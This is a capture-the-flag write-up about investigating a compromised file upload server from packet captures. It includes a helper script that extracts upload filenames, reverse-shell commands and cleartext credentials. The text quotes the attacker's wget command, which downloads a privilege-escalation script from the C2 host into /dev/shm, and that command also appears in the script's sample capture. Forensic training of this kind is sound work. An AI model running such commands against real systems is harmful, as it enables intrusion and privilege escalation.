👮‍♂️SFF CTF 25

SkillsFuture CTF 2025 - forensics-style CTF challenges

On 19th July I participated in the SkillsFuture (SFF) CTF open category and got 3rd place after solving all the challenges in 19 minutes and 43 seconds.

The background context behind the CTF is that you are doing forensics work for a police station, and a file upload server has been compromised. The challenges are done sequentially, so you have to solve the current challenge to move on to the next.

We are first given a pcap file containing the network traffic between the file upload server and the public.

Suspicious file name

We are told that we need to look for a suspicious file upload, and to submit the name of the file as the answer for the first challenge. Open the pcap in Wireshark and apply a display filter that shows only HTTP file uploads:

Going to the second last entry and looking under HTTP File Data, we can see that the malicious file uploaded was hell0fr13nd.py:

C2 Server IP address and Port

For the second question we are told that the malicious file, once executed, causes the server to establish a connection to a C2 server, and we are asked for the IP address and port of that C2 server. We can find this information in the same packet, in the contents of the uploaded file. The IP address is 3.237.200.21 and the port is 1234.

Command used to download file from C2 server

For the third question we are asked for the command run on the file upload server to retrieve a file from the C2 server. For this we need to change the filter to look for HTTP requests and responses exchanged with the C2 server. We can use http && ip.addr == 3.237.200.21 as our filter.

We can see that the server retrieves linuxprivchecker.py via a GET request to the C2 server (on port 8000), but the HTTP traffic only shows the download itself, not the shell command that triggered it. That command was typed over the reverse shell, i.e. the TCP connection to port 1234 we found in the previous question, so we apply the ip.addr == 3.237.200.21 && tcp.port == 1234 filter and read the command out of that stream:

So the command used was wget http://3.237.200.21:8000/linuxprivchecker.py -O /dev/shm/linuxprivchecker.py.

Part 2 - Web server credentials

For the next part, we need to find the credentials used to access a web server at http://3.86.60.136/

In order to do this, we are given a bunch of pcaps and we are told that one of them contains the network traffic from when an admin logged in to the server. Since the server is reached over plain HTTP, the login form fields are in the captures in cleartext, so to do this quickly we can just cd into the folder containing all the pcaps and run strings * | grep username.
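The three Wireshark look-ups from Part 1 (the uploaded filename, the commands sent over the C2 channel on port 1234) and the credential hunt from Part 2 can all be done with one small script instead of clicking through packets. The block below is an added example, not code from the CTF or the original write-up: a dependency-free walker over classic pcap files that groups TCP payloads per flow direction and then pulls out multipart upload filenames, the operator's command lines, and urlencoded login credentials. The C2 address, the port and the file names come from the write-up; the server and client addresses, the MACs, the multipart body and the admin credentials in the embedded sample capture are constructed so the script runs offline.

```python
import re
import struct
from collections import defaultdict
from urllib.parse import parse_qs

C2_IP, C2_PORT = "3.237.200.21", 1234          # values from the write-up
FILENAME_RE = re.compile(rb'Content-Disposition:[^\r\n]*filename="([^"]+)"')


def tcp_streams(pcap: bytes):
    """Map (src, sport, dst, dport) -> concatenated TCP payload, in capture order,
    for a classic little-endian pcap of Ethernet frames. No seq-number reassembly:
    fine for a clean CTF capture, not for real traffic with retransmissions."""
    if struct.unpack_from("<I", pcap)[0] != 0xA1B2C3D4 or struct.unpack_from("<I", pcap, 20)[0] != 1:
        raise ValueError("expected a little-endian classic pcap with Ethernet link type")
    streams, off = defaultdict(bytes), 24
    while off + 16 <= len(pcap):
        incl_len = struct.unpack_from("<IIII", pcap, off)[2]
        frame = pcap[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":      # not IPv4
            continue
        ip = frame[14:]
        if ip[9] != 6:                                           # not TCP
            continue
        tcp = ip[(ip[0] & 0x0F) * 4:struct.unpack_from("!H", ip, 2)[0]]
        if len(tcp) < 20:                                        # truncated header
            continue
        sport, dport = struct.unpack_from("!HH", tcp)
        payload = tcp[(tcp[12] >> 4) * 4:]                       # skip TCP header + options
        if payload:
            src, dst = (".".join(map(str, ip[i:i + 4])) for i in (12, 16))
            streams[(src, sport, dst, dport)] += payload
    return streams


def find_uploaded_filenames(pcap: bytes):
    """Challenge 1: filenames carried in multipart/form-data POST bodies."""
    return [m.decode() for data in tcp_streams(pcap).values()
            if data.startswith(b"POST ") for m in FILENAME_RE.findall(data)]


def find_c2_commands(pcap: bytes, c2_ip: str = C2_IP, c2_port: int = C2_PORT):
    """Challenge 3: lines the operator typed into the reverse shell. They travel
    from the C2 listener (c2_ip:c2_port) down to the victim, so select that
    direction rather than the victim's replies."""
    cmds = []
    for (src, sport, _, _), data in tcp_streams(pcap).items():
        if src == c2_ip and sport == c2_port:
            cmds += [l.decode(errors="replace") for l in data.splitlines() if l.strip()]
    return cmds


def find_credentials(pcap: bytes):
    """Part 2: (username, password) pairs from plaintext urlencoded login POSTs,
    the same thing `strings * | grep username` surfaces, but parsed properly."""
    found = []
    for data in tcp_streams(pcap).values():
        if data.startswith(b"POST ") and b"\r\n\r\n" in data:
            fields = parse_qs(data.split(b"\r\n\r\n", 1)[1].decode(errors="replace"))
            if "username" in fields and "password" in fields:
                found.append((fields["username"][0], fields["password"][0]))
    return found


# --- constructed sample capture (not from the CTF) so the functions run offline ---
def _frame(src, sport, dst, dport, payload: bytes) -> bytes:
    """Ethernet/IPv4/TCP frame with zeroed MACs and checksums (the parser ignores both)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_pcap(frames) -> bytes:
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_752_000_000 + i, 0, len(f), len(f)) + f
    return out


SERVER, CLIENT = "10.0.0.5", "203.0.113.7"    # assumed addresses, not from the write-up
SAMPLE_PCAP = build_pcap([
    _frame(CLIENT, 51000, SERVER, 80,              # the malicious upload
           b"POST /upload HTTP/1.1\r\nHost: files\r\nContent-Type: multipart/form-data; boundary=XX\r\n\r\n"
           b'--XX\r\nContent-Disposition: form-data; name="f"; filename="hell0fr13nd.py"\r\n'
           b"Content-Type: text/x-python\r\n\r\nimport socket  # stand-in body\r\n--XX--\r\n"),
    _frame(C2_IP, C2_PORT, SERVER, 45000, b"id\n"),   # operator -> victim over the C2 channel
    _frame(SERVER, 45000, C2_IP, C2_PORT, b"uid=33(www-data) gid=33(www-data)\n"),
    _frame(C2_IP, C2_PORT, SERVER, 45000,
           b"wget http://3.237.200.21:8000/linuxprivchecker.py -O /dev/shm/linuxprivchecker.py\n"),
    _frame(SERVER, 45001, C2_IP, 8000,             # the download that command triggers
           b"GET /linuxprivchecker.py HTTP/1.1\r\nHost: 3.237.200.21:8000\r\n\r\n"),
    _frame(CLIENT, 51001, "3.86.60.136", 80,       # Part 2: admin login over plain HTTP
           b"POST /login HTTP/1.1\r\nHost: 3.86.60.136\r\n"
           b"Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 31\r\n\r\n"
           b"username=admin&password=hunter2"),    # constructed credentials
])

if __name__ == "__main__":
    print("uploads:", find_uploaded_filenames(SAMPLE_PCAP))
    print("c2 commands:", find_c2_commands(SAMPLE_PCAP))
    print("credentials:", find_credentials(SAMPLE_PCAP))
```

For the real challenge you would replace SAMPLE_PCAP with open("capture.pcap", "rb").read() and, for Part 2, loop find_credentials over every file in the directory. The direction check in find_c2_commands is the same idea as the tcp.port == 1234 filter: the GET on port 8000 proves the download happened, but only the C2-to-victim half of the port 1234 stream carries the command that was typed. The parser deliberately skips pcapng files and does not reassemble out-of-order segments, so on a messy real-world capture Wireshark's Follow TCP Stream remains the safer tool.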

Secret message

For the last part, we are asked for the secret message displayed by the web server. We log in and see the message U3VwZXIgQ29uZmlkZW50aWFs. This is not the answer as-is, so we base64-decode it and obtain the actual message: Super Confidential

That concludes the CTF! It was quite easy to solve (especially so with ChatGPT) but I was slowed down by my unfamiliarity with Wireshark. :)
